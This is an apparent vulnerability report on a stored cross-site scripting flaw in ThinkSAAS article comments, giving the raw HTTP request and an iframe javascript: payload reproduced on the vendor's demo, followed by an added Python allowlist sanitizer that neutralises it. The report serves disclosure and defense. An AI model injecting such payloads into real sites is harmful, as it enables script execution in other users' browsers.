Stored XSS (requires registering and logging in)
When posting an article:
POST /index.php?app=article&ac=comment&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 178
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://demo.thinksaas.cn/article/show/395/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:

content=%3Cp%3E11111111111%3C%2Fp%3E<iframe src=javascript:alert('success');height=0 width=0 /><iframe>&authcode=4211&articleid=395&token=602c37a28730ebb4371906d8be6bf3ab0a9a4421

Add the attack PoC <iframe src=javascript:alert('success');height=0 width=0 /><iframe> after the %2Fp%3E in the content parameter.
Reproduced on the official demo: https://demo.thinksaas.cn/article/show/395/
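The report shows the comment `content` field being stored and rendered as HTML without sanitization, so a raw `<iframe src=javascript:...>` survives into the article page. Because the editor legitimately submits markup (the `%3Cp%3E...%3C%2Fp%3E` wrapper in the body), the fix is not to HTML-encode the whole field but to pass it through an allowlist sanitizer before storage. The following is an added example, written in Python rather than the project's PHP and not ThinkSAAS's own code: it decodes the PoC body exactly as posted in the report, runs the `content` value through a small allowlist sanitizer, and also handles the neighbouring cases (a `javascript:` `href`, an inline `on*` handler, a tab-obfuscated scheme, a `<script>` block). The tag and attribute policy is illustrative, not the project's.

```python
"""Added example (not ThinkSAAS code): decode the reported PoC body and run the
comment HTML through an allowlist sanitizer, which is the fix a stored XSS in
rich-text comment content needs (plain output-encoding would break the <p>
markup the editor legitimately submits, so an allowlist is used instead)."""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Constructed from the request body in the report: the reporter appended the
# raw iframe after the form-encoded "</p>" (the iframe itself is not encoded).
POC_BODY = (
    "content=%3Cp%3E11111111111%3C%2Fp%3E"
    "<iframe src=javascript:alert('success');height=0 width=0 /><iframe>"
    "&authcode=4211&articleid=395&token=602c37a28730ebb4371906d8be6bf3ab0a9a4421"
)

# Illustrative policy (an assumption, not ThinkSAAS's): what a comment may keep.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"http", "https", "mailto"}
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")


def decode_form_body(body):
    """Decode application/x-www-form-urlencoded by hand rather than with
    urllib.parse.parse_qs, whose ';' handling differs across Python versions
    (the PoC value contains a ';'). First value of a repeated name wins."""
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(name), unquote_plus(value))
    return fields


def safe_url(value):
    """Allowlist the URL scheme so javascript:/data:/vbscript: are rejected.
    Browsers ignore ASCII control characters inside URLs, so strip them first
    ("java\\tscript:" must not pass). Entity-encoded schemes are already
    decoded by HTMLParser before the attribute value reaches us."""
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", value)
    match = _SCHEME.match(cleaned)
    return match is None or match.group(1).lower() in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Re-serialise only allowlisted tags/attributes; everything else becomes
    nothing (tags, attributes) or escaped text (character data)."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []      # removed tag names; worth logging as an attack signal
        self._in_raw = False   # inside <script>/<style>: discard the content entirely

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._in_raw = True
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue   # drops src, style and every on* event handler
            if name == "href" and not safe_url(value or ""):
                continue
            kept.append(' %s="%s"' % (name, escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._in_raw = False
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._in_raw:
            self.out.append(escape(data, quote=False))


def sanitize_comment(raw_html):
    """Return (clean_html, dropped_tags); store clean_html, alert on dropped_tags."""
    parser = AllowlistSanitizer()
    parser.feed(raw_html)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    content = decode_form_body(POC_BODY)["content"]
    clean, dropped = sanitize_comment(content)
    print("stored :", clean)      # the <p> survives, both iframe tags are gone
    print("dropped:", dropped)
```

The sanitizer works on the parsed tag stream rather than on the raw string, so variants such as `<iframe/src=...>`, attribute values without quotes (as in the PoC) or entity-encoded `&#106;avascript:` are normalised by the parser before the policy is applied; a regex blocklist on the raw `content` string would miss those.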